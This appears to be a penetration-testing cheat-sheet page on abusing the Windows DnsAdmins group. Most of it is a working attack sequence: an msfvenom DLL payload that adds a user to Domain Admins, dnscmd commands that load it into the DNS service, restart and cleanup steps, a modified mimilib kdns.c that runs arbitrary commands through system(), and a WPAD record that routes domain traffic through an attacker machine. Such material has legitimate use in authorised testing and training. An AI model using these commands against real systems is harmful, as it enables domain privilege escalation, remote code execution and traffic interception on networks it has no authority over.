Skip to main content

DnsAdmins

DnsAdmins is a Windows user group that grants administrative control over the DNS Server service.
Members can modify DNS settings, create and delete zones, and manage records using tools like dnscmd or PowerShell. It has a known privilege escalation risk, as members can load arbitrary DLLs into the DNS service. Security best practices recommend limiting membership to reduce potential attack vectors.

Abuse DnsAdmins Group

  1. Generate DLL using msfvenom:
msfvenom -p windows/x64/exec cmd='net group "Domain Admins" rezydev /add /domain' -f dll -o adduser.dll
  1. Transfer adduser.dll to windows target host.
  2. Verify the current logged-in user is part of "DnsAdmins" group.
  3. Load DLL if the current user is part of "DnsAdmins" group:
dnscmd.exe /config /serverlevelplugindll C:\Users\rezydev\Desktop\adduser.dll
  1. Once it's done, we can check if current user can restart DNS Service or if we are supposed to wait hours for it to restart:
Check if current user can restart DNS Service
# Find SID of current user
wmic useraccount where name="rezydev" get sid

# Check for permissions
sc.exe sdshow DNS

## Note: If current user's SID has RPWP we have permission to stop & start the
## DNS service.
  1. Stop The DNS Service
sc stop dns
  1. Start the Service
sc start dns
  1. If everything goes as planned, we should have our user rezydev part of Domain Admins since that's what we made our msfvenom payload for. It could be for reverse shell as well.
Cleanup

# Confirm ServerLevelPluginDll registry key exists
reg query \\10.10.10.10\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

# Delete that Key
reg delete \\10.10.10.10\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters  /v ServerLevelPluginDll

# Restart DNS Service
sc.exe start dns

# Verify if it's running
sc query dns

Abuse Using Mimilib.dll

We can also modify kdns.c to get RCE:

/*	Benjamin DELPY `gentilkiwi`
	https://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdns.h"

DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
{
	return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginCleanup()
{
	return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
	FILE * kdns_logfile;
#pragma warning(push)
#pragma warning(disable:4996)
	if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
#pragma warning(pop)
	{
		klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
		fclose(kdns_logfile);
	    system("ENTER COMMAND HERE");
	}
	return ERROR_SUCCESS;
}

More info here: https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html

Create a WPAD Record

  1. Disable Global Query Block List
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.rezydev.local
  1. Add a WPAD Record
Add-DnsServerResourceRecordA -Name wpad -ZoneName rezydev.local -ComputerName dc01.rezydev.local -IPv4Address 10.10.10.15

Now, every machine running WPAD with default settings will have its traffic proxied through our attack machine.